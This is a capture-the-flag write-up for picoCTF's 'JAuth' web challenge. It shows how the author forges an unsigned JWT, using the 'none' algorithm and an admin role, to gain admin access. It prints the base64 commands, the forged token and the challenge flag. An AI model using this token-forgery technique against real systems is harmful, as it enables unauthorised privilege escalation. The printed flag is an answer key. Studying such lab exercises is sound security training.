# \[Web] JAuth (300 pts)

## Question

Most web application developers use third-party components without testing their security. Some of the past affected companies are:

* Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
* Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
* VerticalScope (internet media company) - outdated version of vBulletin forum software used

Can you identify the components and exploit the vulnerable one? The website is running

[here](http://saturn.picoctf.net:55823/)

The website is running [here](http://saturn.picoctf.net:55823/). Can you become an `admin`?

You can login as `test` with the password `Test123!` to get started.

## Hint

Use the web browser tools to check out the JWT cookie.

The JWT should always have two (2) `.` separators.

## Solution

The challenge gave us a login page. After login in, nothing interesting on the page, then I checked the login request to see what was going on. After login, I’ve got a user token, let’s go to [jwt](https://jwt.io/) and decode it. The notable field here is the role, I got the role of user, so what if we change it to admin?

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FVnU31bRkxS76M4furbsK%2FUntitled.png?alt=media&#x26;token=5055d191-6255-4e38-a41b-8cf2e9c6996e" alt=""><figcaption><p>Token</p></figcaption></figure>

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2F6W7m7Wq3yPcu5xHhdzPi%2FUntitled%20(1).png?alt=media&#x26;token=3a5049b7-74f5-4cf0-9745-cd92cc8fa0f7" alt=""><figcaption><p>Decoded Token</p></figcaption></figure>

I’ve tried to change the role to admin and tried again with a new token, but I failed.

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FPqXepjN2pJ6rcaGxHin0%2FUntitled%20(2).png?alt=media&#x26;token=9837f55a-7fba-4066-9b2d-811b2c6fa3c5" alt=""><figcaption><p>Login using token with modified role</p></figcaption></figure>

Hmm, wait, I could see that the token uses HS256 algorithms, and maybe it could lead to [jwt none algorithm vulnerability](https://portswigger.net/kb/issues/00200901_jwt-none-algorithm-supported). I generated my new own token and change 2 values `alg=none` and `role=admin`

```bash
# Generate new header
echo -n '{"typ":"JWT","alg":"none"}' | base64
=> eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

# Generate new payload
echo -n '{"auth":1674810645022,"agent":"test123","role":"admin","iat":1573358396}' | base64
=> eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9

# Merged JWT
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9.
```

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FOS7h5BV6XPtmq5R129fh%2FUntitled%20(3).png?alt=media&#x26;token=78c86bc7-b43f-4f19-a62c-88fbcc3cf08c" alt=""><figcaption><p>New custom token</p></figcaption></figure>

After got a new token, I sent the request with the new token, luckily, this time I was right, then I got the flag

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FEjaCf9Nnj6MNtNtKeg9M%2FUntitled%20(4).png?alt=media&#x26;token=98bb37a8-78ec-4cd2-b827-9828df720c45" alt=""><figcaption><p>Flag</p></figcaption></figure>

## **Flag**

```json
picoCTF{succ3ss_@u7h3nt1c@710n_bc6d9041}
```